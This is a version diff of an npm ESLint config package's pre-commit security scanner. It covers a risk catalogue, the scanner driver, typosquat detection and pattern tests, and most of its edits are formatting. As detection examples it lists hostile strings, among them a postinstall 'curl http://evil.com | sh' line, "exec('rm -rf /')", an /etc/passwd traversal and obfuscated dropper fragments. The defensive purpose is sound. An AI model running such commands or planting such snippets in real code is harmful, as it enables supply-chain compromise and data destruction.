@archpublicwebsite/eslint-config 1.0.21 → 1.0.23

package/tools/security/risks.mjs

@@ -25,10 +25,10 @@
  */
 export const SEVERITY_SCORE = {
   critical: 4, // CVSS 9.0 – 10.0  → block commit AND push
-  high:     3, // CVSS 7.0 – 8.9   → block commit AND push
-  medium:   2, // CVSS 4.0 – 6.9   → warn; never blocks by default
-  low:      1, // CVSS 0.1 – 3.9   → info only
-  info:     0, // Informational     → no action required
+  high: 3, // CVSS 7.0 – 8.9   → block commit AND push
+  medium: 2, // CVSS 4.0 – 6.9   → warn; never blocks by default
+  low: 1, // CVSS 0.1 – 3.9   → info only
+  info: 0, // Informational     → no action required
 }
 
 /**
@@ -63,8 +63,8 @@ export const RISK_CATEGORIES = [
     owasp: 'A03:2021 – Injection',
     atlas: ['AML.T0051 – LLM Prompt Injection', 'AML.T0010 – ML Supply Chain Compromise'],
     description:
-      'Code that allows an attacker to execute arbitrary instructions on the host machine. '
-      + 'Vectors include eval(), new Function(), child_process.exec(), and dynamic require().',
+      'Code that allows an attacker to execute arbitrary instructions on the host machine. ' +
+      'Vectors include eval(), new Function(), child_process.exec(), and dynamic require().',
     severity: 'critical',
     examples: ['eval(userInput)', 'new Function(str)()', "exec('rm -rf /')"],
   },
@@ -76,9 +76,9 @@ export const RISK_CATEGORIES = [
     owasp: 'A08:2021 – Software and Data Integrity Failures',
     atlas: ['AML.T0010 – ML Supply Chain Compromise', 'AML.T0020 – Poison Training Data'],
     description:
-      'Base64, hex-encoding, or shuffle-cipher patterns used to conceal malicious payloads '
-      + 'from static analysis. Characteristic of supply-chain dropper attacks (event-stream, '
-      + 'ua-parser-js, polyfill.io).',
+      'Base64, hex-encoding, or shuffle-cipher patterns used to conceal malicious payloads ' +
+      'from static analysis. Characteristic of supply-chain dropper attacks (event-stream, ' +
+      'ua-parser-js, polyfill.io).',
     severity: 'high',
     examples: ["Buffer.from('abc', 'base64')", 'String.fromCharCode(104,101,...)', '_$_1e42[0]'],
   },
@@ -90,11 +90,11 @@ export const RISK_CATEGORIES = [
     owasp: 'A03:2021 – Injection',
     atlas: [],
     description:
-      'Modification of Object.prototype or constructor.prototype allows an attacker to '
-      + 'inject properties onto every object in the runtime, which can escalate to RCE '
-      + 'in some server-side Node.js frameworks.',
+      'Modification of Object.prototype or constructor.prototype allows an attacker to ' +
+      'inject properties onto every object in the runtime, which can escalate to RCE ' +
+      'in some server-side Node.js frameworks.',
     severity: 'high',
-    examples: ["obj.__proto__ = {admin: true}", "Object.prototype['x'] = fn"],
+    examples: ['obj.__proto__ = {admin: true}', "Object.prototype['x'] = fn"],
   },
 
   // ── A4: XSS / DOM injection ────────────────────────────────────────────────
@@ -104,9 +104,9 @@ export const RISK_CATEGORIES = [
     owasp: 'A03:2021 – Injection',
     atlas: [],
     description:
-      'Unsanitised content written to the DOM via innerHTML, outerHTML, document.write(), '
-      + 'insertAdjacentHTML(), or Vue v-html allows attackers to execute scripts in the '
-      + "victim's browser context.",
+      'Unsanitised content written to the DOM via innerHTML, outerHTML, document.write(), ' +
+      'insertAdjacentHTML(), or Vue v-html allows attackers to execute scripts in the ' +
+      "victim's browser context.",
     severity: 'high',
     examples: ['el.innerHTML = userInput', 'document.write(data)', '<div v-html="content">'],
   },
@@ -118,9 +118,9 @@ export const RISK_CATEGORIES = [
     owasp: 'A02:2021 – Cryptographic Failures',
     atlas: [],
     description:
-      'API keys, tokens, passwords, or private keys committed to source code. '
-      + 'Exposed secrets are frequently scraped from public repositories by automated bots '
-      + 'within minutes of exposure.',
+      'API keys, tokens, passwords, or private keys committed to source code. ' +
+      'Exposed secrets are frequently scraped from public repositories by automated bots ' +
+      'within minutes of exposure.',
     severity: 'critical',
     examples: ['const API_KEY = "sk-..."', 'password: "hunter2"', 'PRIVATE_KEY = "-----BEGIN RSA"'],
   },
@@ -132,9 +132,9 @@ export const RISK_CATEGORIES = [
     owasp: 'A08:2021 – Software and Data Integrity Failures',
     atlas: ['AML.T0010 – ML Supply Chain Compromise', 'AML.T0020 – Poison Training Data'],
     description:
-      'Malicious code injected via npm package install scripts (preinstall/postinstall), '
-      + 'typosquatted package names, or compromised transitive dependencies. '
-      + 'Covers curl/wget downloads, base64 exec, and credential theft at install time.',
+      'Malicious code injected via npm package install scripts (preinstall/postinstall), ' +
+      'typosquatted package names, or compromised transitive dependencies. ' +
+      'Covers curl/wget downloads, base64 exec, and credential theft at install time.',
     severity: 'critical',
     examples: ['postinstall: "curl http://evil.com | sh"', 'require("logify-utils") // typosquat'],
   },
@@ -146,9 +146,9 @@ export const RISK_CATEGORIES = [
     owasp: 'A01:2021 – Broken Access Control',
     atlas: [],
     description:
-      'User-controlled input used in file-system operations without sanitisation. '
-      + 'Allows attackers to read, write, or delete files outside the intended directory '
-      + "(e.g., reading /etc/passwd via '../../etc/passwd').",
+      'User-controlled input used in file-system operations without sanitisation. ' +
+      'Allows attackers to read, write, or delete files outside the intended directory ' +
+      "(e.g., reading /etc/passwd via '../../etc/passwd').",
     severity: 'high',
     examples: ['fs.readFile(req.params.file)', "path.join(base, '../../../etc/passwd')"],
   },
@@ -160,9 +160,9 @@ export const RISK_CATEGORIES = [
     owasp: 'A10:2021 – Server-Side Request Forgery',
     atlas: [],
     description:
-      'Outbound HTTP requests made with a URL derived from user input, allowing attackers '
-      + 'to probe internal services, cloud metadata APIs (169.254.169.254), or other '
-      + 'resources not directly accessible from the internet.',
+      'Outbound HTTP requests made with a URL derived from user input, allowing attackers ' +
+      'to probe internal services, cloud metadata APIs (169.254.169.254), or other ' +
+      'resources not directly accessible from the internet.',
     severity: 'high',
     examples: ['fetch(req.body.url)', 'axios.get(userSuppliedUrl)'],
   },
@@ -174,9 +174,9 @@ export const RISK_CATEGORIES = [
     owasp: 'A06:2021 – Vulnerable and Outdated Components',
     atlas: [],
     description:
-      'Pathological regular expressions with nested quantifiers on overlapping character '
-      + 'classes cause catastrophic backtracking, making the Node.js event loop unresponsive. '
-      + 'User-controlled input matched against such patterns is a DoS vector.',
+      'Pathological regular expressions with nested quantifiers on overlapping character ' +
+      'classes cause catastrophic backtracking, making the Node.js event loop unresponsive. ' +
+      'User-controlled input matched against such patterns is a DoS vector.',
     severity: 'medium',
     examples: ['/(a+)+$/', '/([a-zA-Z]+)*/', '/(a|aa)+$/'],
   },
@@ -188,9 +188,9 @@ export const RISK_CATEGORIES = [
     owasp: 'A08:2021 – Software and Data Integrity Failures',
     atlas: ['AML.T0024 – Exfiltration via ML Inference API'],
     description:
-      'Network modules (http, https, dns, net) or child_process imported inside Tailwind, '
-      + 'Vite, PostCSS, or ESLint config files. Build tools are executed with elevated '
-      + 'privileges and full file-system access — making them a prime exfiltration vector.',
+      'Network modules (http, https, dns, net) or child_process imported inside Tailwind, ' +
+      'Vite, PostCSS, or ESLint config files. Build tools are executed with elevated ' +
+      'privileges and full file-system access — making them a prime exfiltration vector.',
     severity: 'critical',
     examples: ["import https from 'node:https' // in tailwind.config.ts"],
   },

package/tools/security/scan.mjs

@@ -44,11 +44,7 @@ import {
   printSupplyFinding,
   shouldSkip,
 } from './scanner.mjs'
-import {
-  getRepoRoot,
-  getStagedNameStatus,
-  runSafe,
-} from '../git-hooks/shared.mjs'
+import { getRepoRoot, getStagedNameStatus, runSafe } from '../git-hooks/shared.mjs'
 
 // ─── Read staged file content ──────────────────────────────────────────────────
 
@@ -70,8 +66,8 @@ function readStagedContent(filePath) {
  */
 function scanStagedFiles() {
   const staged = getStagedNameStatus()
-  const toScan = staged.filter(({ status, path }) =>
-    ['A', 'M'].includes(status[0]) && SCAN_EXTENSIONS.has(extname(path)),
+  const toScan = staged.filter(
+    ({ status, path }) => ['A', 'M'].includes(status[0]) && SCAN_EXTENSIONS.has(extname(path))
   )
   if (toScan.length === 0) return []
 
@@ -81,7 +77,10 @@ function scanStagedFiles() {
   let skipped = 0
 
   for (const { path: filePath } of toScan) {
-    if (shouldSkip(filePath)) { skipped++; continue }
+    if (shouldSkip(filePath)) {
+      skipped++
+      continue
+    }
 
     const content = readStagedContent(filePath)
     if (!content) continue
@@ -91,7 +90,7 @@ function scanStagedFiles() {
 
     findings.push(
       ...collectPatternFindings(lines, isConfig, filePath),
-      ...collectObfuscatedLineFindings(lines, filePath),
+      ...collectObfuscatedLineFindings(lines, filePath)
     )
   }
 
@@ -111,10 +110,9 @@ function scanStagedFiles() {
  */
 function getNewlyAddedPackages() {
   const staged = getStagedNameStatus()
-  const pkgFiles = staged.filter(({ status, path }) =>
-    ['A', 'M'].includes(status[0])
-    && path.endsWith('package.json')
-    && !path.includes('node_modules'),
+  const pkgFiles = staged.filter(
+    ({ status, path }) =>
+      ['A', 'M'].includes(status[0]) && path.endsWith('package.json') && !path.includes('node_modules')
   )
   if (pkgFiles.length === 0) return []
 
@@ -131,8 +129,9 @@ function getNewlyAddedPackages() {
         }
       }
       return all
+    } catch {
+      return new Set()
     }
-    catch { return new Set() }
   }
 
   const added = new Set()
@@ -156,8 +155,11 @@ function checkInstallScripts(pkgName, repoRoot) {
   if (!existsSync(pkgJsonPath)) return []
 
   let pkg
-  try { pkg = JSON.parse(readFileSync(pkgJsonPath, 'utf8')) }
-  catch { return [] }
+  try {
+    pkg = JSON.parse(readFileSync(pkgJsonPath, 'utf8'))
+  } catch {
+    return []
+  }
 
   const findings = []
   for (const scriptName of ['preinstall', 'install', 'postinstall']) {
@@ -199,7 +201,7 @@ function scanNewDependencies(repoRoot) {
 
   process.stdout.write(`\nSupply-chain scan: ${newPkgs.length} newly added package(s)...\n`)
 
-  return newPkgs.flatMap((pkgName) => {
+  return newPkgs.flatMap(pkgName => {
     const findings = []
     const similar = detectTyposquat(pkgName)
     if (similar) {
@@ -220,7 +222,7 @@ function scanNewDependencies(repoRoot) {
 function runAudit(repoRoot) {
   if (process.env.SECURITY_AUDIT !== '1') return
 
-  process.stdout.write(`\nRunning pnpm audit (SECURITY_AUDIT=1)...\n`)
+  process.stdout.write('\nRunning pnpm audit (SECURITY_AUDIT=1)...\n')
   const result = runSafe('pnpm audit --audit-level=high 2>&1')
   if (result) process.stdout.write(`${DIM}${result}${R}\n`)
 }
@@ -230,8 +232,8 @@ function runAudit(repoRoot) {
 function main() {
   if (process.env.SKIP_SECURITY_SCAN === '1') {
     process.stderr.write(
-      `\n${YLW}${BOLD}⚠  SKIP_SECURITY_SCAN=1 — all security checks bypassed.${R}\n`
-      + `${YLW}   This bypass is intentional and has been logged.${R}\n\n`,
+      `\n${YLW}${BOLD}⚠  SKIP_SECURITY_SCAN=1 — all security checks bypassed.${R}\n` +
+        `${YLW}   This bypass is intentional and has been logged.${R}\n\n`
     )
     return
   }
@@ -240,7 +242,7 @@ function main() {
 
   printScanHeader('@archipelago/security-scan', 'socket.dev-style pre-commit guard')
 
-  const fileFindings   = scanStagedFiles()
+  const fileFindings = scanStagedFiles()
   const supplyFindings = scanNewDependencies(repoRoot)
 
   runAudit(repoRoot)

package/tools/security/scanner.mjs

@@ -13,24 +13,28 @@ import { CONFIG_FILE_PATTERNS, FILE_PATTERNS, POPULAR_PACKAGES } from './pattern
 
 // ─── ANSI colours ──────────────────────────────────────────────────────────────
 
-export const R    = '\x1b[0m'
-export const RED  = '\x1b[31m'
-export const YLW  = '\x1b[33m'
-export const CYN  = '\x1b[36m'
-export const GRN  = '\x1b[32m'
+export const R = '\x1b[0m'
+export const RED = '\x1b[31m'
+export const YLW = '\x1b[33m'
+export const CYN = '\x1b[36m'
+export const GRN = '\x1b[32m'
 export const BOLD = '\x1b[1m'
-export const DIM  = '\x1b[2m'
-export const HR   = `\x1b[2m${'─'.repeat(62)}\x1b[0m`
+export const DIM = '\x1b[2m'
+export const HR = `\x1b[2m${'─'.repeat(62)}\x1b[0m`
 
 // ─── Severity badge ────────────────────────────────────────────────────────────
 
 /** @param {'critical'|'high'|'medium'|'low'} severity */
 export function badge(severity) {
   switch (severity) {
-    case 'critical': return `${RED}${BOLD}[CRITICAL]${R}`
-    case 'high':     return `${RED}[HIGH]    ${R}`
-    case 'medium':   return `${YLW}[MEDIUM]  ${R}`
-    default:         return `${CYN}[LOW]     ${R}`
+    case 'critical':
+      return `${RED}${BOLD}[CRITICAL]${R}`
+    case 'high':
+      return `${RED}[HIGH]    ${R}`
+    case 'medium':
+      return `${YLW}[MEDIUM]  ${R}`
+    default:
+      return `${CYN}[LOW]     ${R}`
   }
 }
 
@@ -43,6 +47,7 @@ export function badge(severity) {
  */
 export const SELF_REFERENTIAL_SCAN_EXCLUSIONS = [
   'packages/eslint-config/eslint.config.mjs',
+  'packages/eslint-config/tools/git-hooks/pre-commit.mjs',
   'packages/eslint-config/tools/git-hooks/pre-push.mjs',
   'packages/eslint-config/tools/security/patterns.mjs',
   'packages/eslint-config/tools/security/risks.mjs',
@@ -142,9 +147,7 @@ export function levenshtein(a, b) {
   for (let j = 0; j <= b.length; j++) dp[0][j] = j
   for (let i = 1; i <= a.length; i++) {
     for (let j = 1; j <= b.length; j++) {
-      dp[i][j] = a[i - 1] === b[j - 1]
-        ? dp[i - 1][j - 1]
-        : 1 + Math.min(dp[i - 1][j], dp[i][j - 1], dp[i - 1][j - 1])
+      dp[i][j] = a[i - 1] === b[j - 1] ? dp[i - 1][j - 1] : 1 + Math.min(dp[i - 1][j], dp[i][j - 1], dp[i - 1][j - 1])
     }
   }
   return dp[a.length][b.length]
@@ -157,7 +160,28 @@ export function levenshtein(a, b) {
  * @returns {string|null}
  */
 export function detectTyposquat(pkgName) {
-  const bare = pkgName.startsWith('@') ? (pkgName.split('/')[1] ?? pkgName) : pkgName
+  const trustedScopes = new Set(['@storybook', '@types', '@vitejs', '@vitest', '@nuxt', '@vue', '@typescript-eslint'])
+
+  if (pkgName.startsWith('@')) {
+    const [scope = '', scopedName = ''] = pkgName.split('/')
+    // Trusted namespaces publish many package variants (vue3, react-vite, etc.)
+    // and should not be treated as typosquat candidates.
+    if (trustedScopes.has(scope)) return null
+
+    const bareScoped = scopedName || pkgName
+    if (bareScoped.length < 3) return null
+    for (const popular of POPULAR_PACKAGES) {
+      if (bareScoped === popular) return null
+      // Skip legit version-suffixed variants like vue3/react18.
+      if (bareScoped === `${popular}2` || bareScoped === `${popular}3` || bareScoped === `${popular}18`) {
+        return null
+      }
+      if (levenshtein(bareScoped.toLowerCase(), popular.toLowerCase()) === 1) return popular
+    }
+    return null
+  }
+
+  const bare = pkgName
   if (bare.length < 3) return null
   for (const popular of POPULAR_PACKAGES) {
     if (bare === popular) return null
@@ -217,9 +241,7 @@ export function printScanHeader(title, subtitle) {
 export function printScanFooter(blocking, warnings, blockMessage, bypassHint) {
   console.log(`\n${HR}`)
   if (blocking.length === 0) {
-    const warnNote = warnings.length > 0
-      ? `  ${DIM}(${warnings.length} warning(s) — review recommended)${R}`
-      : ''
+    const warnNote = warnings.length > 0 ? `  ${DIM}(${warnings.length} warning(s) — review recommended)${R}` : ''
     console.log(`  ${GRN}${BOLD}✔  Security scan passed${R}${warnNote}`)
     console.log(HR)
     console.log()

package/tools/security/test-patterns.mjs

@@ -21,34 +21,34 @@ const testCases = [
   {
     label: 'Dropper — global require hijack',
     expectedId: 'require-global-hijack',
-    line: "global[_$_1e42[0]]= require;",
+    line: 'global[_$_1e42[0]]= require;',
   },
   {
     label: 'Dropper — global bracket assignment via decoded array',
     expectedId: 'global-bracket-assignment',
-    line: "global[_$_1e42[2]]= module",
+    line: 'global[_$_1e42[2]]= module',
   },
   {
     label: 'Dropper — obfuscated _$_ variable names',
     expectedId: 'obfuscated-variable-names',
-    line: "var _$_1e42=(function(l,e){var h=l.length;var g=[];",
+    line: 'var _$_1e42=(function(l,e){var h=l.length;var g=[];',
   },
   {
     label: 'Dropper — shuffle-cipher IIFE bootstrap',
     expectedId: 'shuffle-cipher-iife',
-    line: `var _$_1e42=(function(l,e){var h=l.length;var g=[];for(var j=0;j<h;j++){g[j]=l.charAt(j)};for(var j=0;j<h;j++){var s=e*(j+489)+(e%19597);var w=e*(j+659)+(e%48014);var t=s%h;var p=w%h;var y=g[t];g[t]=g[p];g[p]=y;e=(s+w)%4573868};return g.join('')})("rmcej%otb%",2857687)`,
+    line: 'var _$_1e42=(function(l,e){var h=l.length;var g=[];for(var j=0;j<h;j++){g[j]=l.charAt(j)};for(var j=0;j<h;j++){var s=e*(j+489)+(e%19597);var w=e*(j+659)+(e%48014);var t=s%h;var p=w%h;var y=g[t];g[t]=g[p];g[p]=y;e=(s+w)%4573868};return g.join(\'\')})("rmcej%otb%",2857687)',
   },
   {
     label: 'Dropper — array-based Function call chain (final execution)',
     expectedId: 'array-fn-call-chain',
-    line: "var Tgw=jFD(LQI,pYd );Tgw(2509);",
+    line: 'var Tgw=jFD(LQI,pYd );Tgw(2509);',
   },
 
   // ── Classic attack patterns ───────────────────────────────────────────────
   {
     label: 'eval() call',
     expectedId: 'no-eval',
-    line: "const x = eval(someVar)",
+    line: 'const x = eval(someVar)',
   },
   {
     label: 'new Function() call',
@@ -58,22 +58,22 @@ const testCases = [
   {
     label: 'Buffer base64 decode',
     expectedId: 'base64-decode',
-    line: `const payload = Buffer.from('abc123', 'base64').toString()`,
+    line: "const payload = Buffer.from('abc123', 'base64').toString()",
   },
   {
     label: 'String.fromCharCode obfuscation',
     expectedId: 'charcode-obfuscation',
-    line: "const s = String.fromCharCode(104, 101, 108, 108, 111, 32, 119, 111, 114)",
+    line: 'const s = String.fromCharCode(104, 101, 108, 108, 111, 32, 119, 111, 114)',
   },
   {
     label: 'Hex-escaped string payload',
     expectedId: 'hex-string-obfuscation',
-    line: `const k='\\x68\\x65\\x6c\\x6c\\x6f\\x77\\x6f\\x72\\x6c\\x64\\x68\\x65\\x6c\\x6c\\x6f\\x77\\x6f\\x72\\x6c\\x64\\x20\\x68'`,
+    line: "const k='\\x68\\x65\\x6c\\x6c\\x6f\\x77\\x6f\\x72\\x6c\\x64\\x68\\x65\\x6c\\x6c\\x6f\\x77\\x6f\\x72\\x6c\\x64\\x20\\x68'",
   },
   {
     label: 'Prototype pollution',
     expectedId: 'prototype-pollution',
-    line: "obj.__proto__ = { admin: true }",
+    line: 'obj.__proto__ = { admin: true }',
   },
   {
     label: 'child_process in config',
@@ -97,14 +97,11 @@ for (const tc of testCases) {
     console.log(`${GRN}✔${R}  ${tc.label}`)
     console.log(`   ${YLW}→ [${hit.severity.toUpperCase()}] ${hit.id}${R}`)
     passed++
-  }
-  else {
+  } else {
     console.log(`${RED}${BOLD}✖  ${tc.label}${R}`)
     console.log(`   Expected pattern id: ${tc.expectedId}`)
-    if (matched.length > 0)
-      console.log(`   (other matches: ${matched.map(p => p.id).join(', ')})`)
-    else
-      console.log(`   (no patterns matched this line)`)
+    if (matched.length > 0) console.log(`   (other matches: ${matched.map(p => p.id).join(', ')})`)
+    else console.log('   (no patterns matched this line)')
     failed++
   }
 }